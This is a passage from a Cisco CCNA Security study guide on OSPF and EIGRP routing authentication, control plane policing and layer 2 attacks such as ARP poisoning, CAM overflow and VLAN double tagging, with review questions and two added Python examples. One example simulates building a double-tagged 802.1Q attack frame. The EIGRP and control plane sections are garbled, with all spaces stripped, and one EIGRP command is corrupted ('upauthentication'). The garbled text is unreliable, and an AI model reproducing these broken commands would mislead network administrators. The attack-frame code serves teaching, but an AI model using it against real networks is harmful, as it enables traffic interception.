The key chain name is significant only to the local router and does not have to match on the two routers on either end of the link. The key ID, the key string, and the hashing algorithm must match, because the key ID is carried in every OSPF packet and the receiving router uses it to select the key it checks the digest against. MD5 key strings are limited to 16 characters.
In the following example, I'm going to use MD5 for the configuration. I will first configure router R64 and then router R65 on the other end of the link. The first step is to configure the key chain as shown here. The key chain on R64 will be ospf-keys.
R64(config)# key chain ospf-keys
R64(config-keychain)#
Notice the prompt has changed, and I am now in key chain configuration mode, which is where I will define the key number as follows. The number I am using is 1.
R64(config-keychain)# key 1
R64(config-keychain-key)#
Again, the prompt has changed, and I am in key 1 configuration mode, which is where I define the characters in the key, called the key string. The string I am using is troymac.
R64(config-keychain-key)# key-string troymac
R64(config-keychain-key)#
The next step is to tell the router the algorithm (MD5) to use for this key, which is done at the same key 1 prompt.
R64(config-keychain-key)# cryptographic-algorithm md5
R64(config-keychain-key)#
The final step is to apply the key chain, from interface configuration mode, to the interface that connects to router R65.
R64(config-if)# ip ospf authentication key-chain ospf-keys
R64(config-if)#
Keep in mind that while one of the routers is set to use authentication and the other has not yet been configured, routing updates will fail, and the devices will no longer be OSPF neighbors. This will resolve itself as soon as the other router is correctly configured.
The configuration can be the same on router R65, but I'm going to change the one value that does not have to match, the key chain name, just to show that it doesn't have to match, while keeping the values that do have to match (the key ID, the key string, and the hashing algorithm) the same. The following is the entire set of commands on R65:
R65(config)# key chain router-keys
R65(config-keychain)# key 1
R65(config-keychain-key)# key-string troymac
R65(config-keychain-key)# cryptographic-algorithm md5
R65(config-keychain-key)# exit
R65(config-keychain)# exit
R65(config)# interface g0/1
R65(config-if)# ip ospf authentication key-chain router-keys
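As an added illustration that is not part of the book, the following Python code models what the R64/R65 configuration above does on the wire, following the OSPFv2 cryptographic authentication procedure in RFC 2328 Appendix D. It also covers the EIGRP case in the next section, since EIGRP carries a key ID in the same way. The key chains, the router ID, and the Hello body are constructed for the demonstration, and key strings shorter than 16 bytes are zero-padded to 16 (the convention Cisco IOS uses for MD5 keys). It shows why the chain name never matters while a mismatched key ID or key string breaks the adjacency, and why altered or replayed packets are rejected.

```python
import hashlib
import hmac
import struct

# Added example: OSPFv2 cryptographic (MD5) authentication, RFC 2328 Appendix D.
AUTH_TYPE_CRYPTO = 2

def ospf_header(router_id: bytes, area_id: bytes, key_id: int, seq: int, length: int) -> bytes:
    """24-byte OSPFv2 header. With AuType 2 the checksum is 0 and the 8-byte
    authentication field carries (0, key ID, auth data length, sequence number)."""
    fixed = struct.pack("!BBH4s4sHH", 2, 1, length, router_id, area_id, 0, AUTH_TYPE_CRYPTO)
    return fixed + struct.pack("!HBBI", 0, key_id, 16, seq)

def ospf_md5_digest(packet: bytes, key_string: str) -> bytes:
    """MD5 over the whole OSPF packet followed by the 16-byte (zero-padded) key."""
    key = key_string.encode()[:16].ljust(16, b"\x00")
    return hashlib.md5(packet + key).digest()

def build_hello(key_chain: dict, key_id: int, router_id: bytes, area_id: bytes,
                seq: int, body: bytes) -> bytes:
    """Sender: select the key by ID from its own chain and append the digest."""
    key_string, algorithm = key_chain[key_id]
    if algorithm != "md5":
        raise ValueError("this example implements the MD5 mode only")
    packet = ospf_header(router_id, area_id, key_id, seq, 24 + len(body)) + body
    return packet + ospf_md5_digest(packet, key_string)

def verify_hello(key_chain: dict, data: bytes, last_seq=None):
    """Receiver: the Key ID in the header selects the key; the chain name is irrelevant."""
    length, = struct.unpack("!H", data[2:4])
    autype, = struct.unpack("!H", data[14:16])
    if autype != AUTH_TYPE_CRYPTO:
        return False, "authentication type mismatch"
    key_id, auth_len, seq = struct.unpack("!xxBBI", data[16:24])
    packet, digest = data[:length], data[length:length + auth_len]
    if key_id not in key_chain:
        return False, f"key ID {key_id} not found in key chain"
    if last_seq is not None and seq < last_seq:
        return False, "sequence number went backwards (replay)"
    key_string, _ = key_chain[key_id]
    if not hmac.compare_digest(ospf_md5_digest(packet, key_string), digest):
        return False, "digest mismatch (key string differs or packet altered)"
    return True, "authenticated"

# Key chains as {key ID: (key string, algorithm)}; chain names never reach the wire.
R64_OSPF_KEYS = {1: ("troymac", "md5")}      # key chain ospf-keys on R64
R65_ROUTER_KEYS = {1: ("troymac", "md5")}    # key chain router-keys on R65: other name, same key 1
R65_WRONG_ID = {2: ("troymac", "md5")}       # same string, but stored under key 2
R65_WRONG_STR = {1: ("troymac2", "md5")}     # key 1 present, different string

R64_ID, AREA_0 = bytes([10, 0, 0, 64]), bytes(4)
# Constructed Hello body: mask /24, hello 10 s, options 0x02 (E), priority 1, dead 40 s, no DR/BDR.
HELLO_BODY = struct.pack("!4sHBBI4s4s", bytes([255, 255, 255, 0]), 10, 0x02, 1, 40,
                         bytes(4), bytes(4))

def demo() -> dict:
    """Result strings for each receiver-side scenario."""
    wire = build_hello(R64_OSPF_KEYS, 1, R64_ID, AREA_0, seq=1000, body=HELLO_BODY)
    tampered = wire[:31] + bytes([wire[31] ^ 0x80]) + wire[32:]   # flip a bit in the router priority
    return {
        "name_differs_key_matches": verify_hello(R65_ROUTER_KEYS, wire)[1],
        "key_id_differs": verify_hello(R65_WRONG_ID, wire)[1],
        "key_string_differs": verify_hello(R65_WRONG_STR, wire)[1],
        "altered_in_transit": verify_hello(R65_ROUTER_KEYS, tampered)[1],
        "replayed": verify_hello(R65_ROUTER_KEYS, wire, last_seq=1001)[1],
    }

if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:26} {result}")
```

The keyed digest proves that the sender holds the key string, but MD5 here is a plain hash over packet plus key, not an HMAC; the SHA-256 HMAC mode that cryptographic-algorithm hmac-sha-256 selects is the stronger choice wherever both neighbors support it.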
ImplementingEIGRPRoutingUpdateAuthenticationConfiguringEIGRProutingupdateauthenticationissimilartoOSPF.However,OSPFspecifiesthehashingalgorithmsinthesamemodewhereyouspecifythekeystring,butinEIGRPyouspecifythatontheinterface.ThefollowingarethecommandsforR64andR65.Additionally,whenyouspecifythealgorithm,youspecifytheEIGRPASnumberinthesamecommand.Inthefollowingexamples,thatASnumberis66.Noticethat,again,thekeychainnamesandkeynumbersdonothavetomatch,whilethekeystringandhashingalgorithmsdohavetomatch.
R64(config)#key-chainrouter-keys
R64(config-keychain)#key1
R64(config-keychain-key)#key-stringtroymac
R64(config-keychain-key)#end
R64(config)#intg0/2
R64(config-if)#ipauthenticationkey-chainrouter-keys
R64(config-if)#upauthenticationmodeeigrp66md5
R65(config)#key-chainEIGRP-keys
R65(config-keychain)#key2
R65(config-keychain-key)#key-stringtroymac
R65(config-keychain-key)#end
R65(config)#intg0/1
R65(config-if)#ipauthenticationkey-chainEIGRP-keys
R65(config-if)#ipauthenticationmodeeigrp66md5
SecuringtheControlPlaneTherearefourtypesofpacketsthataroutermayencounter,andtheyoperateinfour“planes”oftherouter.Thefourplanesandthetypesofpacketsthatoperateintheseplanesareasfollows:
DataPlanePacketsTheseareend-station,user-generatedpacketsthatarealwaysforwardedbynetworkdevicestootherend-stationdevices.
ControlPlanePacketsThesearenetworkdevice–generatedorreceivedpacketsthatareusedforthecreationandoperationofthenetworkitself.ExamplesincludeprotocolssuchasARP,BGP,andOSPF.
ManagementPlanePacketsThesearenetworkdevice–generatedorreceivedpacketsormanagementstation–generatedorreceivedpacketsthatareusedtomanagethenetwork.ExamplesareTelnet,SSH,TFTP,SNMP,FTP,NTP,HTTP,HTTPSandotherprotocolsusedtomanagethedeviceand/ornetwork.
ServicesPlanePacketsAsubsetofdataplanepackets,servicesplanepacketsarealsouser-generatedpacketsthatareforwardedbynetworkdevicestootherend-stationdevices.ExamplesincludesuchfunctionsasGREencapsulation,QoS,MPLSVPNs,andSSL/IPsecencryption/decryption.
Theconcerninthissectioniswiththeprotectionofaccesstothecontrolplane,whichincludes
thehardwareandsoftwarethatsupportsroutingandthemanagementofthedevice.Packetsinthecontrolplanearethosethatareeitherdestinedfortherouteritselforgeneratedbytherouter.Ifaccesstothecontrolplaneisnotprotected,routingtablecorruption,changestotherouterconfiguration,andDoSattacksontheroutermayresult.
ControlPlanePolicingControlplanepolicing(CoPP)isaCiscoIOSfeaturethatcanbeimplementedtopreventtheseissues.Itsimplementationisanadvancedtopicnotcoveredintheexamobjectives;however,anunderstandingofitsuseisincludedintheexamobjectives.
CoPPtreatsthecontrolplaneasastand-aloneentitywithitsowningressandegressports.Itallowsfortheimplementationofcontrolsattheingressporttothecontrolplane.Figure4.1showstherelationshipbetweenthosecontrolplaneingressandegressportsandthephysicalinterfaces.Italsoshowsthepathstakenbythefourtypesoftrafficdiscussedintheprevioussection.
FIGURE4.1CoPP
NoticethatthreetypesoftrafficcanbecontrolledbyCoPP,thatis,management,control,andservicestraffic.Alsonoticethatwhenaccesscontrollists(ACLs)areappliedtotheingressphysicalinterfaceandCoPPhasalsobeenapplied,CoPPcomesintoplayonlyfortrafficthatwasallowedthroughtheingressphysicalinterfaceACL.Asyoucansee,ultimatelyCoPPisdesignedtoprotecttherouteprocessor.Controlscanbeimplementedthatallowanddisallowcertaintypesoftrafficandcanalsobeusedtorate-limitthetrafficsoastopreventaDoSattack.
WhenCoPPisconfigured,theconfigurationfollowstheCiscoModularQoSCLI(MQC).Inthismodel,threemechanismsareused.
ClassMapsUsedtocategorizetraffictypesintoclasses.ACLsaretypicallyusedtodefinethetraffic,andthentheACLisreferencedintheclassmap.
PolicyMapsUsedtodefinetheactiontobetakenforaparticularclass.Actionsthatcanbe
specifiedareallow,block,andrate-limit.
ServicePoliciesUsedtospecifywherethepolicymapshouldbeimplemented.
Figure4.2showstherelationshipbetweenthesemechanisms.
FIGURE4.2Modularpolicyframework
Thisframeworkisusedforotherfeaturesaswell,suchasQoSandtrafficshaping.
Summary
In this chapter, you learned about methods for securing administrative access to the router or switch. You also learned how IOS privilege levels and IOS role-based CLI can be used to specify allowed actions. The Cisco IOS resilient configuration feature and its benefits were introduced. You also learned how to configure authentication for router updates for both OSPF and EIGRP. Finally, the chapter discussed how control plane policing can be used to control access to the control plane.
Exam Essentials
Secure administrative access to the router. Complete the steps required to use Secure Shell to administer the router. These steps include setting the router name and domain name and generating the RSA key. It also includes specifying the use of SSH on the vty lines.
Control administrative actions. Configure IOS privilege levels and IOS role-based CLI to specify actions allowed by technicians when maintaining the router.
Implement Cisco IOS resilient configuration. Protect the integrity and availability of both the IOS and the startup configuration by configuring the Cisco IOS resilient configuration feature.
Implement OSPF routing update authentication. Describe the steps involved in configuring authentication between two OSPF routers that is invoked at each routing update.
Implement EIGRP routing update authentication. Describe the steps involved in configuring authentication between two EIGRP routers that is invoked at each routing update.
Describe the benefits of securing the control plane. Understand the dangers that confront the control plane of a router and how control plane policing can be used to control access to the control plane and prevent attacks on it.
Review Questions
1. Which of the following is not a required step when configuring a router for SSH access?
A. Set the router name.
B. Generate the RSA key.
C. Set the router domain name.
D. Set the router loopback IP address.
2. Which of the following statements is true of the following system message?
R63(config)#
*Mar 28 18:32:09.095: %SSH-5-ENABLED: SSH 1.99 has been enabled
A. This router will accept connections only from SSH version 1 devices.
B. This router will accept connections only from SSH version 2 devices.
C. This router will accept connections from SSH version 1 or SSH version 2 devices.
D. This router is an SSH version 1 device.
3. Which statement is false with regard to this configuration?
R63(config)#line vty 0 1114
R63(config-line)#login local
R63(config-line)#transport input ssh
R63(config-line)#
A. vty line 67 is affected by this configuration.
B. The user accounts for access to the vty lines are contained on this router.
C. Only SSH is allowed to be used on the vty lines.
D. SSH access will be controlled by a TACACS+ server.
4. Which of the following statements is true with regard to privilege levels in the IOS?
A. There are 16 privilege levels.
B. Level 16 is user mode.
C. Level 0 is privileged mode.
D. Privilege levels can be defined on routers but not ASA devices.
5. Which of the following commands allows the technician to whom the privilege level will be assigned to only change IP addresses?
A. privilege exec level 12 show interfaces
B. privilege configure level 12 interface
C. privilege interface level 12 ip
D. enable secret level 12 wordpass
6. Which of the following is the only parser view that exists by default?
A. admin
B. root
C. exec
D. priv
7. Which of the statements is true with regard to the following configuration?
R64(config)#secure boot-image
*April 2 17:24:50.231: %IOS_Reslience-5-IMAGE_RESIL_ACTIVE: Successfully secured running image
A. It secures the startup configuration.
B. It secures the IOS image.
C. It secures both the IOS image and the startup configuration.
D. It secures nothing until an additional command is run.
8. Which of the following statements is false with regard to the Cisco IOS resilient configuration?
A. The IOS image and the startup configuration are called the secure bootset when protected.
B. Once secured, the configuration cannot be removed.
C. To restore the bootset, you must know its location.
D. To restore the bootset, you must know its name.
9. Which of the following can be done only from a console connection?
A. Set up SSH.
B. Remove a secure bootset configuration.
C. Create a privilege level.
D. Generate an SSH key.
10. Which of the following hashing algorithms are used to implement OSPF routing update authentication?
A. MD4
B. MD5
C. SHA1
D. SHA2
11. Which of the following configuration settings must match in the two routers when configuring OSPF routing update authentication?
A. Key chain name
B. Key number
C. Key string
D. Router passwords
12. To which component is the key chain applied when configuring OSPF routing update authentication?
A. Routing protocol
B. Hashing algorithm
C. Interface
D. Key
13. To which component is the key applied when configuring OSPF routing update authentication?
A. Routing protocol
B. Hashing algorithm
C. Interface
D. Key chain
14. To which component is the hashing algorithm applied when configuring OSPF routing update authentication?
A. Key
B. Hashing algorithm
C. Interface
D. Key chain
15. How is configuring EIGRP routing update authentication different from OSPF?
A. OSPF specifies the hashing algorithms in the same mode where you specify the key string; in EIGRP, that is specified on the interface.
B. EIGRP specifies the hashing algorithms in the same mode where you specify the key string; in OSPF, that is specified on the interface.
C. OSPF specifies the key chain in the same mode where you specify the key string; in EIGRP, that is specified on the interface.
D. OSPF specifies the key chain in the same mode where you specify the key string; in EIGRP, that is specified on the hashing algorithm.
16. When you specify the algorithm for EIGRP route update authentication, you also specify what value in the same command?
A. Process ID
B. AS number
C. Area ID
D. Interface number
17. Which packet type comes from end stations to be forwarded by the router?
A. Data plane
B. Control plane
C. Management plane packets
D. Services plane packets
18. Which of the following is an example of control plane packets?
A. Data to be routed
B. OSPF updates
C. Telnet packets
D. Packets forwarded by network devices to other end-station devices
19. Packets that are either destined for the router itself or generated by the router are in which plane?
A. Data plane
B. Services plane
C. Control plane
D. Services plane
20. When CoPP is configured, the configuration follows the Cisco Modular QoS CLI (MQC). In this model, which mechanism specifies the actions to be taken on the specified traffic type?
A. Class map
B. Policy map
C. Service policy
D. Action map
Chapter 5
Understanding Layer 2 Attacks
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
4.4 Common Layer 2 attacks
Describe STP attacks
Describe ARP spoofing
Describe MAC spoofing
Describe CAM table (MAC address table) overflows
Describe CDP/LLDP reconnaissance
Describe VLAN hopping
Describe DHCP spoofing
To prevent a certain type of attack, you must understand the attack. Attacks can occur at a number of different layers of the TCP/IP model. When I discuss layer 2 attacks, I am talking about attacks that use layer 2 addresses (MAC addresses) or that are aimed at protocols that operate at layer 2. Finally, some layer 2 attacks take advantage of layer 3 services such as DHCP, but they do so within a local subnet and thus are also called layer 2 attacks. In this chapter, I’ll describe how a number of layer 2 attacks occur. In the next chapter, I’ll discuss mitigations for these attacks.
In this chapter, you will learn the following:
Common layer 2 attacks
Understanding STP Attacks
Spanning Tree Protocol (STP) is used to prevent switching loops that can occur when there is redundancy built into the switching network. Since redundancy is a desirable design concept, STP is a feature that you cannot live without. Unfortunately, there is an attack on the switching network that takes advantage of the operations of STP. The good news is that Cisco has developed several responses to these attacks, but you must understand the attacks and how the features address the vulnerabilities to properly implement these safeguards. In this chapter, I’ll discuss the attacks and how they work, and in Chapter 6 I’ll cover the implementation of the mitigations.
STP attacks target the loop-free switching topology that is created by the switches using the bridge protocol data units (BPDUs) upon which STP is based. These BPDUs are used by the switches to select the root bridge and thereafter to select the switch ports that are forwarding and those that are blocking. These BPDUs are also used when a change in the topology occurs (such as a link going down) to establish a new loop-free topology based upon the remaining links.
While link issues can cause a change in the topology, another event can cause this as well, and that is the introduction of a new switch in the network that possesses a higher bridge priority (sometimes called a superior BPDU) than the current root bridge. When a malicious individual introduces a rogue switch to the switching network and the rogue switch has a BPDU superior to the one held by the current root bridge, the new switch assumes the position of root bridge.
Since the topology of the switching network depends on the position of the root bridge and the relative position of the other switches to the root bridge, this alters the topology in ways that not only may impact performance but may cause all traffic to traverse the new rogue switch, which will be under the management of the attacker. To see how this can impact the topology, look at Figure 5.1.
FIGURE 5.1 STP attack
Again, mitigations to this attack will be covered in Chapter 6.
Understanding ARP Attacks
An ARP poisoning attack is one that takes advantage of the normal process that devices use to learn an unknown MAC address that a device with a known IP address possesses. Before I cover the ARP poisoning attack, I’ll review the ARP broadcast process.
Address Resolution Protocol (ARP), one of the protocols in the TCP/IP suite, operates at layer 3 of the OSI model. The information it derives is utilized at layer 2, however. ARP’s job is to resolve the destination IP address placed in the header by IP to a layer 2 or MAC address. Remember, when frames are transmitted on a local segment, the transfer is done in terms of MAC addresses, not IP addresses, so this information must be known.
Whenever a packet is sent across the network, at every router hop and again at the destination subnet the source and destination MAC address pairs change, but the source and destination IP addresses do not. The process that ARP uses to perform this resolution is called an ARP broadcast.
First an area of memory called the ARP cache is consulted. If the MAC address has been recently resolved, the mapping will be in the cache, and a broadcast is not required. If the record has aged out of the cache, ARP sends a broadcast frame to the local network that all devices will receive. The device that possesses the IP address responds with its MAC address. Then ARP places the MAC address in the frame and sends the frame. Figure 5.2 illustrates this process.
FIGURE 5.2 ARP process
In an ARP poisoning attack, the attacker sends a packet type called a gratuitous ARP to the target device with an incorrect IP address to MAC address mapping.
What’s a Gratuitous ARP?
A gratuitous ARP is called gratuitous because the ARP message sent is an answer to a question that the target never asks. In the normal ARP process, a device never announces its MAC address to another device unless asked to do so. This means there is an ARP request that goes from device A to device B and then an ARP reply from device B to device A. In the case of the gratuitous ARP, the ARP message is a reply to a request never sent by the target, and it causes a malicious (and incorrect) update to the receiver’s ARP cache.
In a classic man-in-the-middle attack, the attacker will send these gratuitous ARP requests to the two target devices between which he would like to be “in the middle.” In the scenario shown in Figure 5.3, the two targets are the Victim laptop and the default gateway of the Victim laptop.
FIGURE 5.3 ARP cache poisoning
After the gratuitous ARP messages are sent and processed by the two targets, the Victim laptop and the router interface would be sending traffic to the attacker while both thinking they are sending to one another. Mitigations for this attack will be presented in Chapter 6. Stay tuned!
Understanding MAC Attacks
MAC spoofing attacks occur when an attacker changes his MAC address so that his device appears to be another device. As is the case with all spoofing attacks, the ultimate aim is to receive something intended for the real device or to get past access controls based on a MAC address.
A MAC address attack is also considered a switch attack because it leverages the MAC address table in the switch to accomplish the goal of receiving traffic destined for another device. As you know, the MAC address table is populated as frames are sent and received by the switch. On the left side of Figure 5.4, the MAC table prior to the attack is shown.
FIGURE 5.4 MAC spoofing
Prior to the attack, the switch has the MAC address A (shortened for simplicity) recorded on port Fa0/1 where the real holder of that MAC address resides. When the attacker sends a frame with a spoofed MAC address of A, then the switch does what a switch is supposed to do. It removes the MAC address from its current listing of port Fa0/1 and moves it to port Fa0/4, where the attacker resides. Now the attacker will receive all traffic destined for the device on port Fa0/1. This will continue until the device on port Fa0/1 sends a frame. However, by continually sending frames, the attacker will be able to continually update the table to his advantage. But fear not! There are ways to deal with this, and I will cover them in Chapter 6. You’ll get there soon. Don’t peek!
Understanding CAM Overflows
As you know, the MAC address table, also called the content addressable memory (CAM) table, is populated by the switch as frames are switched through it. The switch records the source MAC address of every frame entering each port. There is a limited amount of memory space that is available for this table. In a CAM overflow attack, the attacker floods the switch with frames that have invalid source MAC addresses. This is easier than it sounds by using a tool such as macof.
At some point, the CAM table is full and can hold no other MAC addresses. Any MAC addresses that were in the table prior to the attack will still be there, and those devices will still be able to receive traffic. However, it is not the aim of the attacker to prevent access to these devices. When the table is full and frames destined to MAC addresses that are not currently in the table are received, they will be flooded out all ports. If you think about it, this is the normal operation of a switch when it receives a frame with an unknown destination MAC address. Figure 5.5 shows this attack, with the steps in the process numbered.
FIGURE 5.5 CAM overflow
The result of this attack is that the attacker is now able to receive traffic that he would not have been able to see otherwise because in this condition the switch is basically operating as a hub, not a switch. In Chapter 6 I’ll discuss how to prevent this attack.
Understanding CDP/LLDP Reconnaissance
Cisco Discovery Protocol (CDP) and its standards-based alternative Link Layer Discovery Protocol (LLDP) are useful tools. They can be used to display information about directly connected devices. This can be especially useful when you have no layer 3 connectivity to a neighboring device because the protocols operate at layer 2 and thus can be used to extract information even when IP is not functional. Unfortunately, as is often the case, there is a dark side to these tools.
When a malicious individual is attempting to hack your network, the first thing the hacker does is perform network reconnaissance. This operation amounts to gathering all information possible about the layout of the network and the devices in the network. By capturing the CDP or LLDP packets that are used by Cisco devices to exchange information, a wealth of information can be obtained.
For this reason, many organizations choose to forgo the advantages of using CDP and LLDP and disable the operation of both on Cisco devices. Disabling these features can be done on an interface basis or globally on all interfaces. This time I won’t make you wait until Chapter 6 for the solution.
To disable CDP on an interface, use the following command in interface configuration mode:
Router67(config-if)#no cdp enable
To disable CDP globally, run the following command in global configuration mode:
Router67(config)#no cdp run
To disable LLDP on an interface, run the following commands in interface configuration mode:
Router67(config-if)#no lldp receive
Router67(config-if)#no lldp transmit
To disable LLDP globally, run the following command in global configuration mode:
Router67(config)#no lldp run
Understanding VLAN Hopping
A virtual LAN (VLAN) security issue you should be aware of is called VLAN hopping. By default, a switch port is an access port, which means it can be a member of only a single VLAN. Ports that are configured to carry the traffic of multiple VLANs, called trunk ports, are used to carry traffic between switches and routers. A VLAN hopping attack’s aim is to receive traffic from a VLAN of which the hacker’s port is not a member. This can be done in two ways, covered next.
Switch Spoofing
Switch ports can be set to use a protocol called Dynamic Trunking Protocol (DTP) to negotiate the formation of a trunk link. If an access port is left configured to use DTP, it is possible for hackers to set their interface to spoof a switch and use DTP to create a trunk link. If this occurs, they can capture traffic from all VLANs. Figure 5.6 shows a switch spoofing attack.
FIGURE 5.6 Switch spoofing
The prevention of this attack will be covered in Chapter 6.
Double Tagging
Trunk ports use an encapsulation protocol called 802.1q to place a VLAN tag around each frame to identify the VLAN to which the frame belongs. When a switch at the end of a trunk link receives an 802.1q frame, it strips this off and forwards the traffic to the destination device. In a double tagging attack, the hacker creates a special frame that has two tags. The inner tag is the VLAN to which the hacker wants to send a frame (perhaps with malicious content), and the outer tag is the real VLAN of which the hacker is a member. If the frame goes through two switches (which is possible since VLANs can span switches), the first tag gets taken off by the first switch, leaving the second, which allows the frame to be forwarded to the target VLAN by the second switch.
Figure 5.7 shows this process. In this example, the native VLAN number between the CompanySwitchA and CompanySwitchB switches has been changed from the default of 1 to 10.
FIGURE 5.7 Double tagging
Double tagging is only an issue on switches that use “native” VLANs. A native VLAN is used for any traffic that is still a member of the default VLAN, or VLAN 1. The mitigation of this attack will be covered in Chapter 6.
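The following Python parser, added here and not part of the book, shows the double-tagging sequence described above on a constructed frame: two stacked 802.1q headers, the outer tag removed by the first switch when it matches the trunk’s native VLAN (assuming the 802.1q default that native-VLAN frames are sent untagged), and the second switch placing the frame in the inner VLAN. It also shows that the hop fails when the native VLAN differs from the attacker’s VLAN, and includes a defender’s check for tagged frames arriving on an access port. The MAC addresses are documentation-range values chosen for the example.

```python
"""Parser for Ethernet frames carrying stacked 802.1Q tags, plus a model of
how a trunk handles a double-tagged frame.  Added example, not from the
book; the frames below are constructed.  Assumes the 802.1Q default that
frames in the trunk's native VLAN are sent untagged."""
import struct

TPID_8021Q = 0x8100
ETHERTYPE_IPV4 = 0x0800


def parse_frame(raw):
    """Return (dst, src, vlan_ids outermost first, ethertype, payload)."""
    dst, src = raw[:6], raw[6:12]
    off, vlans = 12, []
    while struct.unpack("!H", raw[off:off + 2])[0] == TPID_8021Q:
        tci = struct.unpack("!H", raw[off + 2:off + 4])[0]
        vlans.append(tci & 0x0FFF)          # VLAN ID is the low 12 bits
        off += 4
    ethertype = struct.unpack("!H", raw[off:off + 2])[0]
    return dst, src, vlans, ethertype, raw[off + 2:]


def build_frame(dst, src, vlans, ethertype, payload):
    out = dst + src
    for vid in vlans:                        # PCP/DEI bits left at zero
        out += struct.pack("!HH", TPID_8021Q, vid & 0x0FFF)
    return out + struct.pack("!H", ethertype) + payload


def trunk_egress(raw, native_vlan):
    """First switch sends the frame over the trunk.  A frame in the native
    VLAN goes out untagged: the outer tag is stripped, and if a second tag
    was hidden underneath, it is now the only tag the next switch sees."""
    dst, src, vlans, ethertype, payload = parse_frame(raw)
    if vlans and vlans[0] == native_vlan:
        return build_frame(dst, src, vlans[1:], ethertype, payload)
    return raw


def trunk_ingress_vlan(raw, native_vlan):
    """Second switch: untagged frames belong to the native VLAN, tagged
    frames to the VLAN in the outermost tag."""
    vlans = parse_frame(raw)[2]
    return vlans[0] if vlans else native_vlan


def access_port_check(raw, port):
    """Defender's view: a tagged frame on an access port is already
    suspicious, and two stacked tags are the signature of double tagging."""
    vlans = parse_frame(raw)[2]
    if len(vlans) >= 2:
        return f"{port}: double-tagged frame, outer VLAN {vlans[0]}, inner VLAN {vlans[1]}"
    if vlans:
        return f"{port}: unexpected 802.1Q tag for VLAN {vlans[0]}"
    return None


# Constructed attacker frame: outer tag = the attacker's own VLAN 10 (the
# trunk's native VLAN in Figure 5.7), inner tag = target VLAN 20.
ATTACK_FRAME = build_frame(bytes.fromhex("ffffffffffff"),
                           bytes.fromhex("00005e00530a"),
                           [10, 20], ETHERTYPE_IPV4, b"payload")


def walk_frame(native_vlan):
    """VLAN in which the second switch ends up delivering the frame."""
    on_trunk = trunk_egress(ATTACK_FRAME, native_vlan)
    return trunk_ingress_vlan(on_trunk, native_vlan)
```

With the native VLAN equal to the attacker’s VLAN (10) the frame lands in VLAN 20; with the native VLAN set to an unused value it stays in VLAN 10.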
Understanding DHCP Spoofing
Dynamic Host Configuration Protocol (DHCP) is used to automate the process of assigning IP configurations to hosts. When configured properly, it reduces administrative overhead, reduces the human error inherent in manual assignment, and enhances device mobility. But it introduces a vulnerability that when leveraged by a malicious individual can result in an inability of hosts to communicate (constituting a DoS attack) and can result in peer-to-peer attacks.
When an illegitimate DHCP server (called a rogue DHCP server) is introduced to the network, unsuspecting hosts may accept DHCP offer packets from the illegitimate DHCP server, rather than the legitimate DHCP server. When this occurs, the rogue DHCP server will not only issue the host an incorrect IP address, subnet mask, and default gateway address (which makes a peer-to-peer attack possible) but can also issue an incorrect DNS server address, which will lead to the host relying on the attacker’s DNS server for the IP addresses of websites (such as major banks), which leads to phishing attacks. Figure 5.8 shows an example of how this can occur.
FIGURE 5.8 DHCP spoofing
In Figure 5.8, after receiving an incorrect IP address, subnet mask, default gateway, and DNS server address from the rogue DHCP server, the DHCP client uses the attacker’s DNS server to obtain the IP address of his bank. This leads him to unwittingly connect to the attacker’s copy of the bank’s website. When the client enters his credentials to log in, the attacker now has his bank credentials and can proceed to empty out his account. It sounds scary, but luckily I will cover mitigation for this attack in Chapter 6!
Summary
In this chapter, you learned about STP attacks such as rogue switches. The chapter discussed how an ARP spoofing attack works and how it leads to a man-in-the-middle attack. MAC spoofing and its use in accessing traffic to which an attacker is not authorized was also covered. You learned how a CAM overflow attack works and its effect on a switch. You looked at both the value and the danger of using CDP and LLDP. Finally, you learned how VLAN hopping attacks are performed.
Exam Essentials
Explain STP attacks. Describe how an attacker can introduce a rogue switch into the network and alter the loop-free switching topology created by STP.
Describe ARP spoofing attacks. Explain how an ARP spoofing attack is set up and what the end result of a successful ARP spoofing attack can be.
Understand MAC spoofing. Describe the purpose of a MAC spoofing attack and how it might enable an attacker to receive traffic to which she is not authorized.
Explain the CAM overflow attack. List the steps that can cause a CAM overflow and describe the potential benefit to a malicious individual.
Understand the issues with CDP and LLDP. Describe the reason for disabling CDP and LLDP and explain how to implement this.
Describe a VLAN hopping attack. List the ways to accomplish a VLAN hopping attack and explain the purpose of this attack.
Explain DHCP snooping. Describe a DHCP spoofing attack and understand the attacks to which it can lead.
Review Questions
1. Which of the following is true of an STP attack?
A. It occurs with the introduction of a new switch in the network that is more powerful than the current root bridge.
B. It occurs with the introduction of a new switch in the network that possesses an inferior BPDU than the current root bridge.
C. It occurs with the introduction of a new switch in the network that possesses a superior BPDU than the current root bridge.
D. It may cause all traffic to bypass the new rogue switch, which will be under the management of the attacker.
2. Which of the following takes advantage of the normal process that devices use to learn an unknown MAC address that a device with a known IP address possesses?
A. CAM overflow
B. ARP poisoning attack
C. DHCP spoofing
D. STP attack
3. Which of the following is used by an attacker to pollute the ARP cache of hosts?
A. Gratuitous ARP
B. Superior BPDU
C. Inferior BPDU
D. DTP
4. Which of the following is checked prior to a host performing an ARP broadcast?
A. CAM table
B. Host file
C. ARP cache
D. LMhosts file
5. Which of the following occurs when an attacker changes his physical address so that his device appears to be another device?
A. DHCP spoofing
B. CAM overflow
C. MAC spoofing
D. Switch spoofing
6. Which of the following is also considered a switch attack?
A. MAC spoofing
B. DHCP spoofing
C. Rogue DHCP
D. ARP spoofing
7. The content addressable memory table is also known as which of the following?
A. ARP cache
B. DNS resolver cache
C. MAC table
D. DHCP scope
8. Which of the following attacks floods the switch with frames that have invalid source MAC addresses?
A. Smurf attack
B. CAM overflow
C. SYN flood
D. Fraggle attack
9. Which of the following attacks causes a switch to basically operate as a hub and not a switch?
A. Smurf attack
B. CAM overflow
C. SYN flood
D. Fraggle attack
10. Which of the following is standards based?
A. LLDP
B. CDP
C. EIGRP
D. DTP
11. Which of the following commands disables CDP on all interfaces when applied at the global configuration prompt?
A. cdp disable
B. no cdp enable
C. no cdp run
D. no cdp receive
12. Which of the following commands disables LLDP reception on an interface when applied at the interface configuration prompt?
A. lldp disable
B. no lldp enable
C. no lldp run
D. no lldp receive
13. Which attack’s aim is to receive traffic from a VLAN of which the hacker’s port is not a member?
A. CDP reconnaissance
B. VLAN hopping
C. DHCP snooping
D. STP attack
14. Which of the following is an example of a VLAN hopping attack?
A. Switch spoofing
B. Man-in-the-middle
C. LLDP reconnaissance
D. ARP spoofing
15. What protocol does the attacker leverage in a switch spoofing attack used to perform VLAN hopping?
A. CDP
B. LLDP
C. DTP
